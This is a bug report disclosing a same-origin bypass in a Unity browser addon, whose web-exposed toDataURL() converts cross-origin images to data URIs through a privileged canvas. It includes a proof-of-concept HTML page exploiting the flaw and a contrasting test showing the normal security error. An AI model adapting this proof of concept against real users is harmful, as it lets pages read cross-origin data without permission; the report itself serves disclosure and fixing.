Comment 0 for bug 1069817

This addon exposes a toDataURL() function to the web which allows content to convert an image (specified by a URL) to a data URI. It seems to work by drawing the image to a canvas and using the canvas.toDataURL() mechanism. However, this function seems to bypass all same-origin checks and returns valid data even if the image URL doesn't have the same origin as the document URL.

canvas.toDataURL() will throw a SecurityError exception if the canvas is not origin-clean. A canvas is not origin clean if you call ctx.drawImage() with a URL which does not have the same origin as the document that the canvas is in. However, the canvas used for the conversion is created in chrome context, so it has full privileges and the usual security mechanisms are bypassed completely.

This can be reproduced with the following test case (I loaded this at http://localhost/test.html):

<html>
<head></head>
<body>
<p id="foo"/>
<script type="text/javascript">
    window.external
          .getUnityObject(1)
          .toDataURL("http://www.ubuntu.com/sites/default/themes/ubuntu10/images/footer_logo.png",
                     function(a, b) {
        document.getElementById("foo").innerHTML = b;
    });
</script>
</html>

In this example, you will see that toDataURL() throws as expected and an alert appears ("The operation is insecure"):

<html>
<head></head>
<body>
<p id="foo"/>
<script type="text/javascript">
    var img = new Image();
    var canvas = document.createElement('canvas');
    var ctx = canvas.getContext('2d');
    img.onload = function() {
        try {
            ctx.drawImage(img, 0, 0);
            document.getElementById("foo").innerHTML = canvas.toDataURL();
        } catch(e) { alert(e); }
    };

    img.src = "http://www.ubuntu.com/sites/default/themes/ubuntu10/images/footer_logo.png";
</script>
</html>